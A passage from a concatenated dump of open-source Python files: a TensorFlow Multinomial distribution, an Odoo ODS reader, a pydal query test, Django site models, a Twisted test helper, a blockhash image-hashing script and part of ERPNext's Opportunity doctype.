this as a batch of `N1 x ... x Nm` different `K` class Multinomial
distributions. `probs`'s components in the last portion of its shape
should sum to `1`. Only one of `logits` or `probs` should be passed in.
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked for validity despite possibly degrading runtime
performance. When `False` invalid inputs may silently render incorrect
outputs.
allow_nan_stats: Python `bool`, default `True`. When `True`, statistics
(e.g., mean, mode, variance) use the value "`NaN`" to indicate the
result is undefined. When `False`, an exception is raised if one or
more of the statistic's batch members are undefined.
name: Python `str` name prefixed to Ops created by this class.
"""
parameters = dict(locals())
with ops.name_scope(name, values=[total_count, logits, probs]) as name:
self._total_count = ops.convert_to_tensor(total_count, name="total_count")
if validate_args:
self._total_count = (
distribution_util.embed_check_nonnegative_integer_form(
self._total_count))
self._logits, self._probs = distribution_util.get_logits_and_probs(
logits=logits,
probs=probs,
multidimensional=True,
validate_args=validate_args,
name=name)
self._mean_val = self._total_count[..., array_ops.newaxis] * self._probs
super(Multinomial, self).__init__(
dtype=self._probs.dtype,
reparameterization_type=distribution.NOT_REPARAMETERIZED,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
parameters=parameters,
graph_parents=[self._total_count,
self._logits,
self._probs],
name=name)
@property
def total_count(self):
"""Number of trials used to construct a sample."""
return self._total_count
@property
def logits(self):
"""Vector of coordinatewise logits."""
return self._logits
@property
def probs(self):
"""Probability of drawing a `1` in that coordinate."""
return self._probs
def _batch_shape_tensor(self):
return array_ops.shape(self._mean_val)[:-1]
def _batch_shape(self):
return self._mean_val.get_shape().with_rank_at_least(1)[:-1]
def _event_shape_tensor(self):
return array_ops.shape(self._mean_val)[-1:]
def _event_shape(self):
return self._mean_val.get_shape().with_rank_at_least(1)[-1:]
def _sample_n(self, n, seed=None):
    """Draw `n` multinomial samples per batch member.

    Each batch member's draws are delegated to `random_ops.multinomial`
    (which samples single trials) and the resulting one-hot vectors are
    summed into counts.
    """
    n_draws = math_ops.cast(self.total_count, dtype=dtypes.int32)
    k = self.event_shape_tensor()[0]
    # broadcast the total_count and logits to same shape
    n_draws = array_ops.ones_like(
        self.logits[..., 0], dtype=n_draws.dtype) * n_draws
    logits = array_ops.ones_like(
        n_draws[..., array_ops.newaxis], dtype=self.logits.dtype) * self.logits
    # flatten the total_count and logits
    flat_logits = array_ops.reshape(logits, [-1, k])  # [B1B2...Bm, k]
    flat_ndraws = n * array_ops.reshape(n_draws, [-1])  # [B1B2...Bm]
    # computes each total_count and logits situation by map_fn

    def _sample_single(args):
        # One batch member: sample n * n_draw categories, then sum the
        # one-hot encodings in groups of n_draw to get n count vectors.
        logits, n_draw = args[0], args[1]  # [K], []
        x = random_ops.multinomial(logits[array_ops.newaxis, ...], n_draw,
                                   seed)  # [1, n*n_draw]
        x = array_ops.reshape(x, shape=[n, -1])  # [n, n_draw]
        x = math_ops.reduce_sum(array_ops.one_hot(x, depth=k), axis=-2)  # [n, k]
        return x

    x = functional_ops.map_fn(
        _sample_single, [flat_logits, flat_ndraws],
        dtype=self.dtype)  # [B1B2...Bm, n, k]
    # reshape the results to proper shape
    x = array_ops.transpose(x, perm=[1, 0, 2])
    final_shape = array_ops.concat([[n], self.batch_shape_tensor(), [k]], 0)
    x = array_ops.reshape(x, final_shape)  # [n, B1, B2,..., Bm, k]
    return x
@distribution_util.AppendDocstring(_multinomial_sample_note)
def _log_prob(self, counts):
    # log P(counts) = unnormalized log-prob minus the log-normalizer.
    return self._log_unnormalized_prob(counts) - self._log_normalization(counts)
def _log_unnormalized_prob(self, counts):
    # sum_k counts_k * log(p_k), with p from log_softmax of the logits.
    counts = self._maybe_assert_valid_sample(counts)
    return math_ops.reduce_sum(counts * nn_ops.log_softmax(self.logits), -1)
def _log_normalization(self, counts):
    # Negative log of the multinomial coefficient for these counts.
    counts = self._maybe_assert_valid_sample(counts)
    return -distribution_util.log_combinations(self.total_count, counts)
def _mean(self):
    # Mean is total_count * probs, precomputed in __init__ as _mean_val.
    return array_ops.identity(self._mean_val)
def _covariance(self):
    # Broadcast probs against total_count's batch shape.
    p = self.probs * array_ops.ones_like(
        self.total_count)[..., array_ops.newaxis]
    # Off-diagonal entries are -(n p_i) p_j (mean_val is n * p); the
    # diagonal is overwritten with the per-coordinate variance.
    return array_ops.matrix_set_diag(
        -math_ops.matmul(self._mean_val[..., array_ops.newaxis],
                         p[..., array_ops.newaxis, :]),  # outer product
        self._variance())
def _variance(self):
    # Broadcast probs against total_count's batch shape.
    p = self.probs * array_ops.ones_like(
        self.total_count)[..., array_ops.newaxis]
    # n*p - n*p*p == n * p * (1 - p), using the precomputed mean n*p.
    return self._mean_val - self._mean_val * p
def _maybe_assert_valid_sample(self, counts):
    """Check counts for proper shape, values, then return tensor version."""
    if not self.validate_args:
        # Runtime checks are opt-in via validate_args.
        return counts
    counts = distribution_util.embed_check_nonnegative_integer_form(counts)
    # A valid multinomial sample must sum to the number of trials.
    return control_flow_ops.with_dependencies([
        check_ops.assert_equal(
            self.total_count, math_ops.reduce_sum(counts, -1),
            message="counts must sum to `self.total_count`"),
    ], counts)
| apache-2.0 |
dfang/odoo | addons/base_import/models/odf_ods_reader.py | 69 | 3584 | # Copyright 2011 Marco Conti
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# sourced from https://github.com/marcoconti83/read-ods-with-odfpy
# further altered locally
from odf import opendocument
from odf.table import Table, TableRow, TableCell
from odf.text import P
class ODSReader(object):
    """Minimal reader for OpenDocument spreadsheets (.ods).

    Every sheet of the document is parsed into ``self.SHEETS``, a dict
    mapping sheet name -> list of rows, each row a list of cell strings.
    Cell text starting with "#" is treated as a comment and stored as "".
    """

    # loads the file
    def __init__(self, file=None, content=None, clonespannedcolumns=None):
        if not content:
            self.clonespannedcolumns = clonespannedcolumns
            self.doc = opendocument.load(file)
        else:
            self.clonespannedcolumns = clonespannedcolumns
            self.doc = content
        self.SHEETS = {}
        for sheet in self.doc.spreadsheet.getElementsByType(Table):
            self.readSheet(sheet)

    # reads a sheet in the sheet dictionary, storing each sheet as an
    # array (rows) of arrays (columns)
    def readSheet(self, sheet):
        name = sheet.getAttribute("name")
        rows = sheet.getElementsByType(TableRow)
        arrRows = []
        # for each row
        for row in rows:
            arrCells = []
            cells = row.getElementsByType(TableCell)
            # for each cell
            for count, cell in enumerate(cells, start=1):
                # repeated value?  (the attribute is ignored on the last,
                # possibly padding, cell of the row)
                repeat = 0
                if count != len(cells):
                    repeat = cell.getAttribute("numbercolumnsrepeated")
                if not repeat:
                    repeat = 1
                spanned = int(cell.getAttribute('numbercolumnsspanned') or 0)
                # clone spanned cells
                if self.clonespannedcolumns is not None and spanned > 1:
                    repeat = spanned
                ps = cell.getElementsByType(P)
                textContent = u""
                # for each text/text:span node
                for p in ps:
                    for n in p.childNodes:
                        if n.nodeType == 1 and n.tagName == "text:span":
                            for c in n.childNodes:
                                if c.nodeType == 3:
                                    # BUGFIX: read the text from the child
                                    # text node ``c``; ``n`` is the span
                                    # *element* and has no ``.data``.
                                    textContent = u'{}{}'.format(textContent, c.data)
                        if n.nodeType == 3:
                            textContent = u'{}{}'.format(textContent, n.data)
                if textContent:
                    if not textContent.startswith("#"):  # ignore comments cells
                        for rr in range(int(repeat)):  # repeated?
                            arrCells.append(textContent)
                else:
                    for rr in range(int(repeat)):
                        arrCells.append("")
            # if row contained something
            if arrCells:
                arrRows.append(arrCells)
        self.SHEETS[name] = arrRows

    # returns a sheet as an array (rows) of arrays (columns)
    def getSheet(self, name):
        return self.SHEETS[name]

    def getFirstSheet(self):
        # NOTE(review): ``itervalues`` is Python-2 only, consistent with the
        # rest of this (Odoo 10 era) module.
        return next(iter(self.SHEETS.itervalues()))
| agpl-3.0 |
nonnib/eve-metrics | web2py/gluon/packages/dal/tests/smart_query.py | 27 | 12831 | from ._compat import unittest
from ._adapt import DEFAULT_URI, IS_GAE, IS_IMAP, drop
from pydal._compat import integer_types
from pydal import DAL, Field
from pydal.helpers.methods import smart_query
@unittest.skipIf(IS_IMAP, "Skip nosql")
class TestSmartQuery(unittest.TestCase):
    """Checks that ``smart_query`` turns textual filter expressions into
    the equivalent pydal ``Query`` objects.

    Field types needing extra imports (decimal, date, time, datetime,
    reference and list:* fields) are intentionally not exercised here.
    """

    def testRun(self):
        db = DAL(DEFAULT_URI, check_reserved=['all'])
        db.define_table('a_table',
                        Field('string_field', 'string'),
                        Field('text_field', 'text'),
                        Field('boolean_field', 'boolean'),
                        Field('integer_field', 'integer'),
                        Field('double_field', 'double'))
        try:
            fields = [db.a_table.id,
                      db.a_table.string_field,
                      db.a_table.text_field,
                      db.a_table.boolean_field,
                      db.a_table.integer_field,
                      db.a_table.double_field]

            # boolean equality
            self.assertEqual(
                smart_query(fields, 'a_table.boolean_field = True'),
                db.a_table.boolean_field == True)

            if not IS_GAE:
                # string operators (LIKE-based, not supported on GAE)
                string_field = db.a_table.string_field
                string_cases = [
                    ('a_table.string_field starts with "pydal"',
                     string_field.startswith('pydal')),
                    ('a_table.string_field ends with "Rocks!!"',
                     string_field.endswith('Rocks!!')),
                    ('a_table.string_field contains "Rocks"',
                     string_field.contains('Rocks')),
                ]
                for keywords, expected in string_cases:
                    self.assertEqual(smart_query(fields, keywords), expected)

            # Integer comparisons: every textual spelling of each operator.
            # ("<>", "=<" and "=>" are not accepted by smart_query over
            # integer fields, so they are deliberately not exercised.)
            f = db.a_table.integer_field
            cases = []
            for spelling in ('=', '==', 'is', 'equal', 'equals', 'equal to'):
                cases.append((spelling, f == 1))
            for spelling in ('not equal', 'not equal to'):
                cases.append((spelling, f != 1))
            for spelling in ('<', 'less than'):
                cases.append((spelling, f < 1))
            for spelling in ('<=', 'less or equal', 'less or equal than',
                             'equal or less', 'equal or less than'):
                cases.append((spelling, f <= 1))
            for spelling in ('>', 'greater than'):
                cases.append((spelling, f > 1))
            for spelling in ('>=', 'greater or equal', 'greater or equal than',
                             'equal or greater', 'equal or greater than'):
                cases.append((spelling, f >= 1))
            for spelling, expected in cases:
                keywords = 'a_table.integer_field %s 1' % spelling
                self.assertEqual(smart_query(fields, keywords), expected)

            # 'in' / 'not in' (belongs) remain untested; currently broken:
            # https://github.com/web2py/pydal/issues/161
        finally:
            # Always clean up the table, even when an assertion fails.
            drop(db.a_table)
# Allow running this test module directly (outside the full test suite).
if __name__ == '__main__':
    unittest.main()
| mit |
dcroc16/skunk_works | google_appengine/lib/django-1.4/django/contrib/sites/models.py | 387 | 2867 | from django.db import models
from django.utils.translation import ugettext_lazy as _
# Process-wide cache mapping SITE_ID -> Site instance; populated by
# SiteManager.get_current() and invalidated by Site.save()/delete().
SITE_CACHE = {}
class SiteManager(models.Manager):
    """Manager providing cached access to the Site for the active SITE_ID."""

    def get_current(self):
        """
        Return the ``Site`` matching ``settings.SITE_ID``.

        The object is fetched from the database only once and then served
        from the module-level ``SITE_CACHE``.
        """
        from django.conf import settings
        try:
            sid = settings.SITE_ID
        except AttributeError:
            from django.core.exceptions import ImproperlyConfigured
            raise ImproperlyConfigured("You're using the Django \"sites framework\" without having set the SITE_ID setting. Create a site in your database and set the SITE_ID setting to fix this error.")
        if sid not in SITE_CACHE:
            SITE_CACHE[sid] = self.get(pk=sid)
        return SITE_CACHE[sid]

    def clear_cache(self):
        """Empty the ``Site`` object cache."""
        global SITE_CACHE
        SITE_CACHE = {}
class Site(models.Model):
    # One row per web site served by this project; backs the
    # ``django_site`` table used by the sites framework.
    domain = models.CharField(_('domain name'), max_length=100)
    name = models.CharField(_('display name'), max_length=50)
    objects = SiteManager()

    class Meta:
        db_table = 'django_site'
        verbose_name = _('site')
        verbose_name_plural = _('sites')
        ordering = ('domain',)

    def __unicode__(self):
        return self.domain

    def save(self, *args, **kwargs):
        """Save the site and drop any stale SITE_CACHE entry for it."""
        super(Site, self).save(*args, **kwargs)
        # Cached information will likely be incorrect now.
        if self.id in SITE_CACHE:
            del SITE_CACHE[self.id]

    def delete(self):
        """Delete the site and evict it from SITE_CACHE."""
        pk = self.pk
        super(Site, self).delete()
        try:
            del SITE_CACHE[pk]
        except KeyError:
            pass
class RequestSite(object):
    """
    Stand-in for ``Site`` that mirrors its primary interface (``domain``
    and ``name`` attributes) but takes its data from a Django HttpRequest
    instead of the database.

    The save() and delete() methods raise NotImplementedError.
    """

    def __init__(self, request):
        host = request.get_host()
        self.domain = host
        self.name = host

    def __unicode__(self):
        return self.domain

    def save(self, force_insert=False, force_update=False):
        raise NotImplementedError('RequestSite cannot be saved.')

    def delete(self):
        raise NotImplementedError('RequestSite cannot be deleted.')
def get_current_site(request):
    """
    Checks if contrib.sites is installed and returns either the current
    ``Site`` object or a ``RequestSite`` object based on the request.
    """
    if Site._meta.installed:
        return Site.objects.get_current()
    return RequestSite(request)
| mit |
jxta/cc | vendor/Twisted-10.0.0/twisted/test/testutils.py | 110 | 1525 | from cStringIO import StringIO
from twisted.internet.protocol import FileWrapper
class IOPump:
    """Utility to pump data between clients and servers for protocol testing.

    Perhaps this is a utility worthy of being in protocol.py?
    """

    def __init__(self, client, server, clientIO, serverIO):
        self.client = client
        self.server = server
        self.clientIO = clientIO
        self.serverIO = serverIO

    def flush(self):
        "Pump until there is no more input or output."
        while self.pump():
            pass

    @staticmethod
    def _drain(fileobj):
        # Grab everything buffered in the file-like object, then rewind
        # and truncate it so new writes start from a clean buffer.
        fileobj.seek(0)
        pending = fileobj.read()
        fileobj.seek(0)
        fileobj.truncate()
        return pending

    def pump(self):
        """Move data back and forth.

        Returns whether any data was moved.
        """
        fromClient = self._drain(self.clientIO)
        fromServer = self._drain(self.serverIO)
        for byte in fromClient:
            self.server.dataReceived(byte)
        for byte in fromServer:
            self.client.dataReceived(byte)
        return 1 if (fromClient or fromServer) else 0
def returnConnected(server, client):
    """Take two Protocol instances and connect them.

    Each protocol is attached to a FileWrapper transport backed by an
    in-memory buffer, with an IOPump wired between them; the pump is
    returned so the caller can keep exchanging data.
    """
    cio = StringIO()
    sio = StringIO()
    client.makeConnection(FileWrapper(cio))
    server.makeConnection(FileWrapper(sio))
    pump = IOPump(client, server, cio, sio)
    # Challenge-response authentication:
    pump.flush()
    # A second pass lets replies triggered by the first exchange propagate.
    pump.flush()
    return pump
| apache-2.0 |
grevutiu-gabriel/blockhash-python | blockhash.py | 2 | 7314 | #! /usr/bin/env python
#
# Perceptual image hash calculation tool based on algorithm descibed in
# Block Mean Value Based Image Perceptual Hashing by Bian Yang, Fan Gu and Xiamu Niu
#
# Copyright 2014 Commons Machinery http://commonsmachinery.se/
# Distributed under an MIT license, please see LICENSE in the top dir.
import math
import argparse
import PIL.Image as Image
def median(data):
    """Return the statistical median of *data*.

    For even-length input this is the mean of the two middle values of
    the sorted sequence.
    """
    data = sorted(data)
    length = len(data)
    if length % 2 == 0:
        # BUGFIX: the middle pair of a sorted even-length sequence sits at
        # indices length//2 - 1 and length//2.  The previous indices were
        # off by one (and raised IndexError for two-element input).
        return (data[length // 2 - 1] + data[length // 2]) / 2.0
    return data[length // 2]
def total_value_rgba(im, data, x, y):
    """Sum of the RGB channels of pixel (x, y) in an RGBA image.

    Fully transparent pixels count as pure white (255 * 3) so that
    transparency does not pull the block sums toward black.
    """
    pixel = data[y * im.size[0] + x]
    if pixel[3] == 0:
        return 765
    return pixel[0] + pixel[1] + pixel[2]
def total_value_rgb(im, data, x, y):
    """Sum of the RGB channels of pixel (x, y) in an RGB image."""
    return sum(data[y * im.size[0] + x])
def bits_to_hexhash(bits):
    """Pack a sequence of 0/1 bits into a zero-padded hexadecimal string.

    The width is len(bits) // 4 hex digits (one digit per 4 bits).
    """
    value = 0
    for bit in bits:
        value = (value << 1) | bit
    return '{0:0{1}x}'.format(value, len(bits) // 4)
def blockhash_even(im, bits):
    """Block-mean hash for images whose dimensions divide evenly by *bits*.

    Sums pixel values over a bits x bits grid of equal blocks, then maps
    each block to 0/1 by comparing against the median of its quarter of
    the grid.  Returns the hash as a hex string of bits*bits/4 digits.
    """
    # Pick the channel-sum helper matching the image mode.
    if im.mode == 'RGBA':
        total_value = total_value_rgba
    elif im.mode == 'RGB':
        total_value = total_value_rgb
    else:
        raise RuntimeError('Unsupported image mode: {}'.format(im.mode))
    data = im.getdata()
    width, height = im.size
    blocksize_x = width // bits
    blocksize_y = height // bits
    result = []
    # Accumulate the total pixel value of every block, row-major.
    for y in range(bits):
        for x in range(bits):
            value = 0
            for iy in range(blocksize_y):
                for ix in range(blocksize_x):
                    cx = x * blocksize_x + ix
                    cy = y * blocksize_y + iy
                    value += total_value(im, data, cx, cy)
            result.append(value)
    # One median per quarter of the block grid.
    m = []
    for i in range(4):
        m.append(median(result[i*bits*bits//4:i*bits*bits//4+bits*bits//4]))
    # Threshold each block against its quarter's median: below -> 0, else 1.
    for i in range(bits * bits):
        if (((result[i] < m[0]) and (i < bits*bits/4)) or
                ((result[i] < m[1]) and (i >= bits*bits/4) and (i < bits*bits/2)) or
                ((result[i] < m[2]) and (i >= bits*bits/2) and (i < bits*bits/4+bits*bits/2)) or
                ((result[i] < m[3]) and (i >= bits*bits/2+bits*bits/4))):
            result[i] = 0
        else:
            result[i] = 1
    return bits_to_hexhash(result)
def blockhash(im, bits):
    """Block-mean hash for arbitrary image sizes.

    When the dimensions divide evenly by *bits* this delegates to
    blockhash_even; otherwise each pixel's value is split between the
    (up to four) blocks it overlaps, weighted by the fractional overlap.
    Returns the hash as a hex string of bits*bits/4 digits.
    """
    # Pick the channel-sum helper matching the image mode.
    if im.mode == 'RGBA':
        total_value = total_value_rgba
    elif im.mode == 'RGB':
        total_value = total_value_rgb
    else:
        raise RuntimeError('Unsupported image mode: {}'.format(im.mode))
    data = im.getdata()
    width, height = im.size
    even_x = width % bits == 0
    even_y = height % bits == 0
    if even_x and even_y:
        return blockhash_even(im, bits)
    blocks = [[0 for col in range(bits)] for row in range(bits)]
    # Fractional block dimensions in pixels.
    block_width = float(width) / bits
    block_height = float(height) / bits
    for y in range(height):
        if even_y:
            # don't bother dividing y, if the size evenly divides by bits
            block_top = block_bottom = int(y // block_height)
            weight_top, weight_bottom = 1, 0
        else:
            # Split this pixel row between the block above and below the
            # fractional boundary, proportionally to the overlap.
            y_frac, y_int = math.modf((y + 1) % block_height)
            weight_top = (1 - y_frac)
            weight_bottom = (y_frac)
            # y_int will be 0 on bottom/right borders and on block boundaries
            if y_int > 0 or (y + 1) == height:
                block_top = block_bottom = int(y // block_height)
            else:
                block_top = int(y // block_height)
                block_bottom = int(-(-y // block_height))  # int(math.ceil(float(y) / block_height))
        for x in range(width):
            value = total_value(im, data, x, y)
            if even_x:
                # don't bother dividing x, if the size evenly divides by bits
                block_left = block_right = int(x // block_width)
                weight_left, weight_right = 1, 0
            else:
                # Same fractional split as above, along the x axis.
                x_frac, x_int = math.modf((x + 1) % block_width)
                weight_left = (1 - x_frac)
                weight_right = (x_frac)
                # x_int will be 0 on bottom/right borders and on block boundaries
                if x_int > 0 or (x + 1) == width:
                    block_left = block_right = int(x // block_width)
                else:
                    block_left = int(x // block_width)
                    block_right = int(-(-x // block_width))  # int(math.ceil(float(x) / block_width))
            # add weighted pixel value to relevant blocks
            blocks[block_top][block_left] += value * weight_top * weight_left
            blocks[block_top][block_right] += value * weight_top * weight_right
            blocks[block_bottom][block_left] += value * weight_bottom * weight_left
            blocks[block_bottom][block_right] += value * weight_bottom * weight_right
    result = [blocks[row][col] for row in range(bits) for col in range(bits)]
    # One median per quarter of the block grid.
    m = []
    for i in range(4):
        m.append(median(result[i*bits*bits//4:i*bits*bits//4+bits*bits//4]))
    # Threshold each block against its quarter's median: below -> 0, else 1.
    for i in range(bits * bits):
        if (((result[i] < m[0]) and (i < bits*bits/4)) or
                ((result[i] < m[1]) and (i >= bits*bits/4) and (i < bits*bits/2)) or
                ((result[i] < m[2]) and (i >= bits*bits/2) and (i < bits*bits/4+bits*bits/2)) or
                ((result[i] < m[3]) and (i >= bits*bits/2+bits*bits/4))):
            result[i] = 0
        else:
            result[i] = 1
    return bits_to_hexhash(result)
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    # NOTE(review): type=bool does not parse "False" as false -- any
    # non-empty argument string makes args.quick truthy.  Consider
    # action='store_true'; left as-is to preserve the existing CLI.
    parser.add_argument('--quick', type=bool, default=False,
                        help='Use quick hashing method. Default: False')
    parser.add_argument('--bits', type=int, default=16,
                        help='Create hash of size N^2 bits. Default: 16')
    parser.add_argument('--size',
                        help='Resize image to specified size before hashing, e.g. 256x256')
    parser.add_argument('--interpolation', type=int, default=1, choices=[1, 2, 3, 4],
                        help='Interpolation method: 1 - nearest neightbor, 2 - bilinear, 3 - bicubic, 4 - antialias. Default: 1')
    parser.add_argument('--debug', action='store_true',
                        help='Print hashes as 2D maps (for debugging)')
    parser.add_argument('filenames', nargs='+')

    args = parser.parse_args()

    # Map the numeric choice onto PIL's resampling filters.
    if args.interpolation == 1:
        interpolation = Image.NEAREST
    elif args.interpolation == 2:
        interpolation = Image.BILINEAR
    elif args.interpolation == 3:
        interpolation = Image.BICUBIC
    elif args.interpolation == 4:
        interpolation = Image.ANTIALIAS

    if args.quick:
        method = blockhash_even
    else:
        method = blockhash

    for fn in args.filenames:
        im = Image.open(fn)
        # convert indexed/grayscale images to RGB
        if im.mode == '1' or im.mode == 'L' or im.mode == 'P':
            im = im.convert('RGB')
        elif im.mode == 'LA':
            im = im.convert('RGBA')
        if args.size:
            size = args.size.split('x')
            size = (int(size[0]), int(size[1]))
            im = im.resize(size, interpolation)
        hash = method(im, args.bits)
        print('{} {}'.format(fn, hash))
        if args.debug:
            # Render the hash as a bits x bits grid of 0/1 characters.
            bin_hash = bin(int(hash, 16))[2:]
            map = [bin_hash[i:i+args.bits] for i in range(0, len(bin_hash), args.bits)]
            print("")
            print("\n".join(map))
            print("")
anandpdoshi/erpnext | erpnext/crm/doctype/opportunity/opportunity.py | 1 | 7868 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe, json
from frappe.utils import cstr, cint, get_fullname
from frappe import msgprint, _
from frappe.model.mapper import get_mapped_doc
from erpnext.setup.utils import get_exchange_rate
from erpnext.utilities.transaction_base import TransactionBase
from erpnext.accounts.party import get_party_account_currency
# Presumably used by frappe's communication/email-inbox framework to map
# incoming messages onto this doctype (subject -> title, sender ->
# contact_email) -- TODO(review): confirm against frappe's email handling.
subject_field = "title"
sender_field = "contact_email"
class Opportunity(TransactionBase):
    """A sales opportunity, created either from a Lead or from an existing
    Customer, optionally carrying a list of items of interest."""

    def after_insert(self):
        # Creating an opportunity against a lead updates the lead's status.
        if self.lead:
            frappe.get_doc("Lead", self.lead).set_status(update=True)

    def validate(self):
        # Snapshot the previously saved contact details so that
        # TransactionBase can reschedule the calendar event if they change.
        self._prev = frappe._dict({
            "contact_date": frappe.db.get_value("Opportunity", self.name, "contact_date") if \
                (not cint(self.get("__islocal"))) else None,
            "contact_by": frappe.db.get_value("Opportunity", self.name, "contact_by") if \
                (not cint(self.get("__islocal"))) else None,
        })

        self.make_new_lead_if_required()

        if not self.enquiry_from:
            frappe.throw(_("Opportunity From field is mandatory"))

        self.set_status()
        self.validate_item_details()
        self.validate_uom_is_integer("uom", "qty")
        self.validate_lead_cust()
        self.validate_cust_name()

        if not self.title:
            self.title = self.customer_name

    def make_new_lead_if_required(self):
        """Set lead against new opportunity"""
        if not (self.lead or self.customer):
            lead_name = frappe.db.get_value("Lead", {"email_id": self.contact_email})
            if not lead_name:
                sender_name = get_fullname(self.contact_email)
                if sender_name == self.contact_email:
                    sender_name = None
                # Fall back to building a display name from the local part of
                # the address, e.g. "john.doe@x.com" -> "John Doe ".
                # BUGFIX: sender_name was None here, so the concatenation
                # below raised TypeError; also test containment instead of
                # str.index, which raises ValueError when "@" is absent.
                if not sender_name and "@" in self.contact_email:
                    email_name = self.contact_email[0:self.contact_email.index('@')]
                    sender_name = ""
                    for s in email_name.split('.'):
                        sender_name += s.capitalize() + ' '

                lead = frappe.get_doc({
                    "doctype": "Lead",
                    "email_id": self.contact_email,
                    "lead_name": sender_name
                })
                lead.insert(ignore_permissions=True)
                lead_name = lead.name

            self.enquiry_from = "Lead"
            self.lead = lead_name

    def declare_enquiry_lost(self, arg):
        """Mark this opportunity as Lost with reason *arg*, unless a
        quotation has already been made from it."""
        if not self.has_quotation():
            frappe.db.set(self, 'status', 'Lost')
            frappe.db.set(self, 'order_lost_reason', arg)
        else:
            frappe.throw(_("Cannot declare as lost, because Quotation has been made."))

    def on_trash(self):
        # Remove calendar events linked to this opportunity.
        self.delete_events()

    def has_quotation(self):
        """Return a submitted Quotation Item referencing this opportunity, if any."""
        return frappe.db.get_value("Quotation Item", {"prevdoc_docname": self.name, "docstatus": 1})

    def has_ordered_quotation(self):
        """Return submitted quotations made from this opportunity that were ordered."""
        return frappe.db.sql("""select q.name from `tabQuotation` q, `tabQuotation Item` qi
            where q.name = qi.parent and q.docstatus=1 and qi.prevdoc_docname =%s and q.status = 'Ordered'""", self.name)

    def validate_cust_name(self):
        # Derive the display name from the linked customer or lead.
        if self.customer:
            self.customer_name = frappe.db.get_value("Customer", self.customer, "customer_name")
        elif self.lead:
            lead_name, company_name = frappe.db.get_value("Lead", self.lead, ["lead_name", "company_name"])
            self.customer_name = company_name or lead_name

    def get_cust_address(self, name):
        """Return address and primary-contact details for customer *name*.

        Raises frappe.DoesNotExistError when the customer is missing.
        """
        details = frappe.db.sql("""select customer_name, address, territory, customer_group
            from `tabCustomer` where name = %s and docstatus != 2""", (name), as_dict=1)
        if details:
            ret = {
                'customer_name': details and details[0]['customer_name'] or '',
                'address': details and details[0]['address'] or '',
                'territory': details and details[0]['territory'] or '',
                'customer_group': details and details[0]['customer_group'] or ''
            }
            # The primary contact is fetched separately so that customers
            # without one still return their own details (a join would
            # drop the row entirely).
            contact_det = frappe.db.sql("""select contact_name, contact_no, email_id
                from `tabContact` where customer = %s and is_customer = 1
                and is_primary_contact = 'Yes' and docstatus != 2""", name, as_dict=1)

            ret['contact_person'] = contact_det and contact_det[0]['contact_name'] or ''
            ret['contact_no'] = contact_det and contact_det[0]['contact_no'] or ''
            ret['email_id'] = contact_det and contact_det[0]['email_id'] or ''

            return ret
        else:
            frappe.throw(_("Customer {0} does not exist").format(name), frappe.DoesNotExistError)

    def on_update(self):
        self.add_calendar_event()

    def add_calendar_event(self, opts=None, force=False):
        """Create or update the follow-up calendar event for this opportunity."""
        if not opts:
            opts = frappe._dict()

        opts.description = ""
        opts.contact_date = self.contact_date

        if self.customer:
            if self.contact_person:
                opts.description = 'Contact ' + cstr(self.contact_person)
            else:
                opts.description = 'Contact customer ' + cstr(self.customer)
        elif self.lead:
            if self.contact_display:
                opts.description = 'Contact ' + cstr(self.contact_display)
            else:
                opts.description = 'Contact lead ' + cstr(self.lead)

        opts.subject = opts.description
        opts.description += '. By : ' + cstr(self.contact_by)

        if self.to_discuss:
            opts.description += ' To Discuss : ' + cstr(self.to_discuss)

        super(Opportunity, self).add_calendar_event(opts, force)

    def validate_item_details(self):
        # Fill missing display fields on item rows from the Item master.
        if not self.get('items'):
            return

        # set missing values
        item_fields = ("item_name", "description", "item_group", "brand")
        for d in self.items:
            if not d.item_code:
                continue
            item = frappe.db.get_value("Item", d.item_code, item_fields, as_dict=True)
            for key in item_fields:
                if not d.get(key):
                    d.set(key, item.get(key))

    def validate_lead_cust(self):
        # Exactly one of lead/customer must be set, matching enquiry_from.
        if self.enquiry_from == 'Lead':
            if not self.lead:
                frappe.throw(_("Lead must be set if Opportunity is made from Lead"))
            else:
                self.customer = None
        elif self.enquiry_from == 'Customer':
            if not self.customer:
                msgprint("Customer is mandatory if 'Opportunity From' is selected as Customer", raise_exception=1)
            else:
                self.lead = None
@frappe.whitelist()
def get_item_details(item_code):
    """Return display details (name, uom, description, image, group,
    brand) for *item_code*; empty strings when the item is missing."""
    rows = frappe.db.sql("""select item_name, stock_uom, image, description, item_group, brand
        from `tabItem` where name = %s""", item_code, as_dict=1)
    row = rows[0] if rows else {}
    return {
        'item_name': row.get('item_name') or '',
        'uom': row.get('stock_uom') or '',
        'description': row.get('description') or '',
        'image': row.get('image') or '',
        'item_group': row.get('item_group') or '',
        'brand': row.get('brand') or ''
    }
@frappe.whitelist()
def make_quotation(source_name, target_doc=None):
    """Map the Opportunity *source_name* to a new draft Quotation.

    Returns the mapped (not yet inserted) Quotation document.
    """
    def set_missing_values(source, target):
        # Pick the currency from the customer's account (falling back to
        # the company currency) and set the exchange rate accordingly.
        quotation = frappe.get_doc(target)
        company_currency = frappe.db.get_value("Company", quotation.company, "default_currency")
        party_account_currency = get_party_account_currency("Customer", quotation.customer,
            quotation.company) if quotation.customer else company_currency
        quotation.currency = party_account_currency or company_currency
        if company_currency == quotation.currency:
            exchange_rate = 1
        else:
            exchange_rate = get_exchange_rate(quotation.currency, company_currency)
        quotation.conversion_rate = exchange_rate
        quotation.run_method("set_missing_values")
        quotation.run_method("calculate_taxes_and_totals")

    doclist = get_mapped_doc("Opportunity", source_name, {
        "Opportunity": {
            "doctype": "Quotation",
            "field_map": {
                "enquiry_from": "quotation_to",
                "enquiry_type": "order_type",
                "name": "enq_no",
            }
        },
        "Opportunity Item": {
            "doctype": "Quotation Item",
            "field_map": {
                "parent": "prevdoc_docname",
                "parenttype": "prevdoc_doctype",
                "uom": "stock_uom"
            },
            "add_if_empty": True
        }
    }, target_doc, set_missing_values)

    return doclist
@frappe.whitelist()
